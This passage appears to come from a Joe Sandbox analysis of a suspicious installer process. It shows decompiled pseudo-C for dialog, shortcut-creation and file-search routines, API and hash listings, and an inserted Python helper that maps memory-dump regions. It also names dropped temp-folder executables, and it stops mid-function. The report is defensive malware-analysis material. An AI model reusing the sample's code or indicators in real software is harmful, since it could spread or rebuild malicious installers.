                                                        						L53:
                                                        						return E00404631(_a8, _a12, _a16);
                                                        					} else {
                                                        						 *_t138(_t166, 1);
                                                        						goto L8;
                                                        					}
                                                        				}
                                                        			}

                                                        0x00404abb
                                                        0x00404ac1
                                                        0x00404ac7
                                                        0x00404ad4
                                                        0x00404ae2
                                                        0x00404ae5
                                                        0x00404aed
                                                        0x00404af3
                                                        0x00404af3
                                                        0x00404aff
                                                        0x00404b02
                                                        0x00404b70
                                                        0x00404b77
                                                        0x00404c4e
                                                        0x00404c55
                                                        0x00404c64
                                                        0x00404c64
                                                        0x00404c68
                                                        0x00404c72
                                                        0x00404c7f
                                                        0x00404c81
                                                        0x00404c81
                                                        0x00404c8f
                                                        0x00404c96
                                                        0x00404c9d
                                                        0x00404ca0
                                                        0x00404cdc
                                                        0x00404cde
                                                        0x00404ce4
                                                        0x00404ce9
                                                        0x00404ced
                                                        0x00404cef
                                                        0x00404cef
                                                        0x00404d0b
                                                        0x00000000
                                                        0x00404d0d
                                                        0x00404d10
                                                        0x00404d1e
                                                        0x00404d24
                                                        0x00404d25
                                                        0x00404d28
                                                        0x00404d2b
                                                        0x00000000
                                                        0x00404d2b
                                                        0x00404ca2
                                                        0x00404ca4
                                                        0x00404ca8
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00404caa
                                                        0x00404caa
                                                        0x00404cb7
                                                        0x00404cbc
                                                        0x00000000
                                                        0x00000000
                                                        0x00404cc0
                                                        0x00404cc2
                                                        0x00404cc2
                                                        0x00404ccb
                                                        0x00404ccd
                                                        0x00404cd2
                                                        0x00404cd5
                                                        0x00404cda
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00404cda
                                                        0x00404d37
                                                        0x00404d41
                                                        0x00404d44
                                                        0x00404d47
                                                        0x00404d4e
                                                        0x00404d4e
                                                        0x00404d50
                                                        0x00404d50
                                                        0x00404d55
                                                        0x00404d57
                                                        0x00404d5f
                                                        0x00404d66
                                                        0x00404d68
                                                        0x00404d73
                                                        0x00404d73
                                                        0x00404d68
                                                        0x00404d83
                                                        0x00404d8d
                                                        0x00404d95
                                                        0x00404db0
                                                        0x00404d97
                                                        0x00404da0
                                                        0x00404da0
                                                        0x00404d95
                                                        0x00404db5
                                                        0x00404dba
                                                        0x00404dbf
                                                        0x00404dc8
                                                        0x00404dc8
                                                        0x00404dd1
                                                        0x00404dd3
                                                        0x00404dd3
                                                        0x00404ddf
                                                        0x00404de7
                                                        0x00404df1
                                                        0x00404df1
                                                        0x00404df6
                                                        0x00000000
                                                        0x00404df6
                                                        0x00404ca0
                                                        0x00404c57
                                                        0x00404c5e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00404c5e
                                                        0x00404b7d
                                                        0x00404b86
                                                        0x00404ba0
                                                        0x00404ba5
                                                        0x00404baf
                                                        0x00404bb6
                                                        0x00404bc2
                                                        0x00404bc5
                                                        0x00404bc8
                                                        0x00404bcf
                                                        0x00404bd7
                                                        0x00404bda
                                                        0x00404bde
                                                        0x00404be5
                                                        0x00404bed
                                                        0x00404c47
                                                        0x00404bef
                                                        0x00404bf0
                                                        0x00404bf7
                                                        0x00404c01
                                                        0x00404c09
                                                        0x00404c16
                                                        0x00404c2a
                                                        0x00404c2e
                                                        0x00404c2e
                                                        0x00404c2a
                                                        0x00404c33
                                                        0x00404c40
                                                        0x00404c40
                                                        0x00404bed
                                                        0x00000000
                                                        0x00404ba5
                                                        0x00404b93
                                                        0x00000000
                                                        0x00000000
                                                        0x00404b99
                                                        0x00000000
                                                        0x00404b04
                                                        0x00404b11
                                                        0x00404b1a
                                                        0x00404b27
                                                        0x00404b27
                                                        0x00404b2e
                                                        0x00404b34
                                                        0x00404b3d
                                                        0x00404b40
                                                        0x00404b43
                                                        0x00404b4b
                                                        0x00404b4e
                                                        0x00404b51
                                                        0x00404b57
                                                        0x00404b5e
                                                        0x00404b65
                                                        0x00404dfc
                                                        0x00404e0e
                                                        0x00404b6b
                                                        0x00404b6e
                                                        0x00000000
                                                        0x00404b6e
                                                        0x00404b65

                                                        APIs
                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404B0A
                                                        • SetWindowTextW.USER32 ref: 00404B34
                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404BE5
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404BF0
                                                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,007A1F88,00000000,?,?), ref: 00404C22
                                                        • lstrcatW.KERNEL32 ref: 00404C2E
                                                        • SetDlgItemTextW.USER32 ref: 00404C40
                                                          • Part of subcall function 00405CB2: GetDlgItemTextW.USER32 ref: 00405CC5
                                                          • Part of subcall function 004068F5: CharNextW.USER32(?), ref: 00406958
                                                          • Part of subcall function 004068F5: CharNextW.USER32(?), ref: 00406967
                                                          • Part of subcall function 004068F5: CharNextW.USER32(?), ref: 0040696C
                                                          • Part of subcall function 004068F5: CharPrevW.USER32(?,?), ref: 0040697F
                                                        • GetDiskFreeSpaceW.KERNEL32(0079FF58,?,?,0000040F,?,0079FF58,0079FF58,?,00000001,0079FF58,?,?,000003FB,?), ref: 00404D03
                                                        • MulDiv.KERNEL32 ref: 00404D1E
                                                          • Part of subcall function 00404E77: lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
                                                          • Part of subcall function 00404E77: wsprintfW.USER32 ref: 00404F21
                                                          • Part of subcall function 00404E77: SetDlgItemTextW.USER32 ref: 00404F34
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: A$C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna
                                                        • API String ID: 2624150263-3265188449
                                                        • Opcode ID: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
                                                        • Instruction ID: 4ef08ca0e285fb36132dd1072a135484aded6f5102cec428142970bb06395e88
                                                        • Opcode Fuzzy Hash: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
                                                        • Instruction Fuzzy Hash: 77A182B1901209ABEB11AFA5CD45AEF77B9EF84314F11803BF601B62D1DB7C89418B69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 67%
                                                        			E004021AA() {
                                                        				signed int _t52;
                                                        				void* _t56;
                                                        				intOrPtr* _t60;
                                                        				intOrPtr _t61;
                                                        				intOrPtr* _t62;
                                                        				intOrPtr* _t64;
                                                        				intOrPtr* _t66;
                                                        				intOrPtr* _t68;
                                                        				intOrPtr* _t70;
                                                        				intOrPtr* _t72;
                                                        				intOrPtr* _t74;
                                                        				intOrPtr* _t76;
                                                        				intOrPtr* _t78;
                                                        				intOrPtr* _t80;
                                                        				void* _t83;
                                                        				intOrPtr* _t91;
                                                        				signed int _t101;
                                                        				signed int _t105;
                                                        				void* _t107;
                                                        
                                                        				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                        				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                        				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                        				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                        				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                        				_t52 =  *(_t107 - 0x20);
                                                        				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                        				_t101 = _t52 & 0x00008000;
                                                        				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                        				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                        				if(E00405FB4( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                        					E00402DA6(0x21);
                                                        				}
                                                        				_t56 = _t107 + 8;
                                                        				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                                                        				if(_t56 < _t83) {
                                                        					L14:
                                                        					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                        					_push(0xfffffff0);
                                                        				} else {
                                                        					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                        					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                                                        					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                        					if(_t61 >= _t83) {
                                                        						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                        						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                        						if(_t101 == _t83) {
                                                        							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                        							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x7b4000);
                                                        						}
                                                        						if(_t105 != _t83) {
                                                        							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                        							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                        						}
                                                        						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                        						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                        						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                        						if( *_t91 != _t83) {
                                                        							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                        							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                        						}
                                                        						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                        						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                        						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                        						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                        						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                        							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                        							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                        						}
                                                        						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                        						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                        					}
                                                        					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                        					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                        					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                        						_push(0xfffffff4);
                                                        					} else {
                                                        						goto L14;
                                                        					}
                                                        				}
                                                        				E00401423();
                                                        				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t107 - 4));
                                                        				return 0;
                                                        			}

                                                        0x004021b3
                                                        0x004021bd
                                                        0x004021c7
                                                        0x004021d1
                                                        0x004021dc
                                                        0x004021df
                                                        0x004021f9
                                                        0x004021fc
                                                        0x00402202
                                                        0x00402205
                                                        0x0040220f
                                                        0x00402213
                                                        0x00402213
                                                        0x00402218
                                                        0x00402229
                                                        0x00402231
                                                        0x004022e8
                                                        0x004022e8
                                                        0x004022ef
                                                        0x00402237
                                                        0x00402237
                                                        0x00402246
                                                        0x0040224a
                                                        0x0040224d
                                                        0x00402253
                                                        0x00402261
                                                        0x00402264
                                                        0x00402266
                                                        Instruction addresses (instruction text not extracted): 0x00402271 to 0x004022fb, then 0x004022e6, 0x004022f1, 0x00402c2d, 0x00402c39

                                                        APIs
                                                        • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?), ref: 00402229
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: CreateInstance
                                                        • String ID:
                                                        • API String ID: 542301482-0
                                                        • Opcode ID: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
                                                        • Instruction ID: c9e7058f2ccac2017f9d88f2873359e197591af4de9cbf84fabb751e216ccc72
                                                        • Opcode Fuzzy Hash: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
                                                        • Instruction Fuzzy Hash: A1411571A00209EFCF40DFE4C989E9D7BB5BF49304B2045AAF505EB2D1DB799981CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 39%
                                                        			E0040290B(short __ebx, short* __edi) {
                                                        				void* _t21;
                                                        
                                                        				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                                                        					E004065B5( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                        					_push(_t21 - 0x2b0);
                                                        					_push(__edi);
                                                        					E0040666E();
                                                        				} else {
                                                        					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                        					 *__edi = __ebx;
                                                        					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                        				}
                                                        				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t21 - 4));
                                                        				return 0;
                                                        			}




                                                        Instruction addresses (instruction text not extracted): 0x00402923, 0x0040293e, 0x00402949, 0x0040294a, 0x00402a94, 0x00402925, 0x00402928, 0x0040292b, 0x0040292e, 0x00402c2d, 0x00402c39

                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID:
                                                        • API String ID: 1974802433-0
                                                        • Opcode ID: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
                                                        • Instruction ID: 9ced82c77f1422a0303d0e50afa4302c42ae01a582b6fde34da312f05d76664a
                                                        • Opcode Fuzzy Hash: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
                                                        • Instruction Fuzzy Hash: 5CF05E71904104EAD701DBA4E949AAEB378EF15314F20457BE101F21D0EBB88E119B29
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%
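The "Memory Dump Source" lists attached to the CoCreateInstance and FindFirstFileW functions above name the same thirteen .sdmp dumps taken from process 4 (the vbc image at offset 0x400000, "based on PE: true"). The following is an added example, not part of the Joe Sandbox report or its tooling: a small Python parser that turns those file names into a region map and answers the two questions an analyst asks of such a list, which dumps are executable and which dump a given global referenced by the decompiled code falls into. The field layout it assumes (process index, analysis stage, dump id, base address, page protection, three trailing fields) is inferred from the names on this page only, and reading field 5 as a winnt.h PAGE_* constant is likewise an assumption, checked only against the fact that the 0x401000 dump (code) carries 0x20 and the 0x400000 dump (PE headers) carries 0x02.

```python
"""Parse Joe Sandbox .sdmp descriptor names into a memory-region map.

Added example; not part of the sandbox report.  The field layout and the
PAGE_* interpretation of field 5 are ASSUMPTIONS inferred from the file
names on this page, not a documented Joe Sandbox format.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Windows page-protection constants from winnt.h.  Treating field 5 of the
# descriptor as one of these is an assumption (0x20 at the code base 0x401000
# and 0x02 at the PE header 0x400000 are consistent with it).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE_MASK = 0xF0  # any of the four PAGE_EXECUTE* bits

# Assumed layout: process.stage.dumpid.base.protect.f6.f7.f8.sdmp
SDMP_RE = re.compile(
    r"^(?P<process>[0-9A-Fa-f]{8})\."
    r"(?P<stage>[0-9A-Fa-f]{8})\."
    r"(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\."
    r"(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?:[0-9A-Fa-f]{8}\.){3}sdmp$"
)

# Constructed from the "Memory Dump Source" entries on this page.
SDMP_NAMES = [
    "00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp",
    "00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp",
    "00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp",
    "00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp",
    "00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp",
    "00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp",
    "00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp",
    "00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp",
    "00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp",
    "00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp",
    "00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp",
    "00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp",
]


@dataclass(frozen=True)
class DumpRegion:
    process: int
    stage: int
    dump_id: int
    base: int
    protect: int

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protect, f"0x{self.protect:x}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXECUTABLE_MASK)


def parse_sdmp_name(name: str) -> DumpRegion:
    """Split one descriptor name into its (assumed) fields."""
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not an sdmp descriptor: {name!r}")
    return DumpRegion(
        process=int(m["process"], 16),
        stage=int(m["stage"], 16),
        dump_id=int(m["dump_id"]),
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
    )


def load_regions(names: List[str]) -> List[DumpRegion]:
    """Parse, drop duplicate descriptors, and sort by base address."""
    return sorted({parse_sdmp_name(n) for n in names}, key=lambda r: r.base)


def executable_regions(regions: List[DumpRegion]) -> List[DumpRegion]:
    return [r for r in regions if r.executable]


def region_containing(regions: List[DumpRegion], addr: int) -> Optional[DumpRegion]:
    """Dump whose base is the highest one at or below addr.

    ASSUMPTION: the names carry no region size, so containment is
    approximated by nearest base; a gap between dumps is not detectable.
    """
    below = [r for r in regions if r.base <= addr]
    return max(below, key=lambda r: r.base) if below else None


def layout(regions: List[DumpRegion], image_base: int = 0x400000) -> List[str]:
    """One human-readable line per region, with offset from the PE base."""
    return [
        f"proc {r.process} stage {r.stage} 0x{r.base:08x} (+0x{r.base - image_base:x}) "
        f"{r.protection_name} [{'exec' if r.executable else 'data'}]"
        for r in regions
    ]


if __name__ == "__main__":
    regs = load_regions(SDMP_NAMES)
    print("\n".join(layout(regs)))
    print("executable:", [hex(r.base) for r in executable_regions(regs)])
    # Global dereferenced by E00405037 (_v24 = *0x7a8ac8) and a code address
    # from the CoCreateInstance reference (00402229):
    for addr in (0x7A8AC8, 0x402229):
        hit = region_containing(regs, addr)
        print(f"0x{addr:x} -> dump at 0x{hit.base:x} ({hit.protection_name})")
```

Run against the names on this page, the only executable dump is the one at 0x401000, which is where the decompiled functions (E0040290B at 0x0040290B, the CoCreateInstance reference at 00402229) live; the globals the dialog procedure reads, such as 0x7a8ac8 and 0x7a8acc, resolve to the read/write dump at 0x7A6000, so a follow-up look at that dump is where the structures those functions index (the 0x818-byte records) would be found.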

                                                        C-Code - Quality: 96%
                                                        			E00405037(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                        				struct HWND__* _v8;
                                                        				struct HWND__* _v12;
                                                        				long _v16;
                                                        				signed int _v20;
                                                        				signed int _v24;
                                                        				intOrPtr _v28;
                                                        				signed char* _v32;
                                                        				int _v36;
                                                        				signed int _v44;
                                                        				int _v48;
                                                        				signed int* _v60;
                                                        				signed char* _v64;
                                                        				signed int _v68;
                                                        				long _v72;
                                                        				void* _v76;
                                                        				intOrPtr _v80;
                                                        				intOrPtr _v84;
                                                        				void* _v88;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t198;
                                                        				intOrPtr _t201;
                                                        				long _t207;
                                                        				signed int _t211;
                                                        				signed int _t222;
                                                        				void* _t225;
                                                        				void* _t226;
                                                        				int _t232;
                                                        				long _t237;
                                                        				long _t238;
                                                        				signed int _t239;
                                                        				signed int _t245;
                                                        				signed int _t247;
                                                        				signed char _t248;
                                                        				signed char _t254;
                                                        				void* _t258;
                                                        				void* _t260;
                                                        				signed char* _t278;
                                                        				signed char _t279;
                                                        				long _t284;
                                                        				struct HWND__* _t291;
                                                        				signed int* _t292;
                                                        				int _t293;
                                                        				long _t294;
                                                        				signed int _t295;
                                                        				void* _t297;
                                                        				long _t298;
                                                        				int _t299;
                                                        				signed int _t300;
                                                        				signed int _t303;
                                                        				signed int _t311;
                                                        				signed char* _t319;
                                                        				int _t324;
                                                        				void* _t326;
                                                        
                                                        				_t291 = _a4;
                                                        				_v12 = GetDlgItem(_t291, 0x3f9);
                                                        				_v8 = GetDlgItem(_t291, 0x408);
                                                        				_t326 = SendMessageW;
                                                        				_v24 =  *0x7a8ac8;
                                                        				_v28 =  *0x7a8ab0 + 0x94;
                                                        				if(_a8 != 0x110) {
                                                        					L23:
                                                        					if(_a8 != 0x405) {
                                                        						_t301 = _a16;
                                                        					} else {
                                                        						_a12 = 0;
                                                        						_t301 = 1;
                                                        						_a8 = 0x40f;
                                                        						_a16 = 1;
                                                        					}
                                                        					if(_a8 == 0x4e || _a8 == 0x413) {
                                                        						_v16 = _t301;
                                                        						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                        							if(( *0x7a8ab9 & 0x00000002) != 0) {
                                                        								L41:
                                                        								if(_v16 != 0) {
                                                        									_t237 = _v16;
                                                        									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                        										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                        									}
                                                        									_t238 = _v16;
                                                        									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                        										_t301 = _v24;
                                                        										_t239 =  *(_t238 + 0x5c);
                                                        										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                        											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                        										} else {
                                                        											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                        										}
                                                        									}
                                                        								}
                                                        								goto L48;
                                                        							}
                                                        							if(_a8 == 0x413) {
                                                        								L33:
                                                        								_t301 = 0 | _a8 != 0x00000413;
                                                        								_t245 = E00404F85(_v8, _a8 != 0x413);
                                                        								_t295 = _t245;
                                                        								if(_t295 >= 0) {
                                                        									_t94 = _v24 + 8; // 0x8
                                                        									_t301 = _t245 * 0x818 + _t94;
                                                        									_t247 =  *_t301;
                                                        									if((_t247 & 0x00000010) == 0) {
                                                        										if((_t247 & 0x00000040) == 0) {
                                                        											_t248 = _t247 ^ 0x00000001;
                                                        										} else {
                                                        											_t254 = _t247 ^ 0x00000080;
                                                        											if(_t254 >= 0) {
                                                        												_t248 = _t254 & 0x000000fe;
                                                        											} else {
                                                        												_t248 = _t254 | 0x00000001;
                                                        											}
                                                        										}
                                                        										 *_t301 = _t248;
                                                        										E0040117D(_t295);
                                                        										_a12 = _t295 + 1;
                                                        										_a16 =  !( *0x7a8ab8) >> 0x00000008 & 0x00000001;
                                                        										_a8 = 0x40f;
                                                        									}
                                                        								}
                                                        								goto L41;
                                                        							}
                                                        							_t301 = _a16;
                                                        							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                        								goto L41;
                                                        							}
                                                        							goto L33;
                                                        						} else {
                                                        							goto L48;
                                                        						}
                                                        					} else {
                                                        						L48:
                                                        						if(_a8 != 0x111) {
                                                        							L56:
                                                        							if(_a8 == 0x200) {
                                                        								SendMessageW(_v8, 0x200, 0, 0);
                                                        							}
                                                        							if(_a8 == 0x40b) {
                                                        								_t225 =  *0x7a1f6c;
                                                        								if(_t225 != 0) {
                                                        									ImageList_Destroy(_t225);
                                                        								}
                                                        								_t226 =  *0x7a1f80;
                                                        								if(_t226 != 0) {
                                                        									GlobalFree(_t226);
                                                        								}
                                                        								 *0x7a1f6c = 0;
                                                        								 *0x7a1f80 = 0;
                                                        								 *0x7a8b00 = 0;
                                                        							}
                                                        							if(_a8 != 0x40f) {
                                                        								L90:
                                                        								if(_a8 == 0x420 && ( *0x7a8ab9 & 0x00000001) != 0) {
                                                        									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                        									ShowWindow(_v8, _t324);
                                                        									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                        								}
                                                        								goto L93;
                                                        							} else {
                                                        								E004011EF(_t301, 0, 0);
                                                        								_t198 = _a12;
                                                        								if(_t198 != 0) {
                                                        									if(_t198 != 0xffffffff) {
                                                        										_t198 = _t198 - 1;
                                                        									}
                                                        									_push(_t198);
                                                        									_push(8);
                                                        									E00405005();
                                                        								}
                                                        								if(_a16 == 0) {
                                                        									L75:
                                                        									E004011EF(_t301, 0, 0);
                                                        									_v36 =  *0x7a1f80;
                                                        									_t201 =  *0x7a8ac8;
                                                        									_v64 = 0xf030;
                                                        									_v24 = 0;
                                                        									if( *0x7a8acc <= 0) {
                                                        										L86:
                                                        										if( *0x7a8b5e == 0x400) {
                                                        											InvalidateRect(_v8, 0, 1);
                                                        										}
                                                        										if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != 0) {
                                                        											E00404F40(0x3ff, 0xfffffffb, E00404F58(5));
                                                        										}
                                                        										goto L90;
                                                        									}
                                                        									_t292 = _t201 + 8;
                                                        									do {
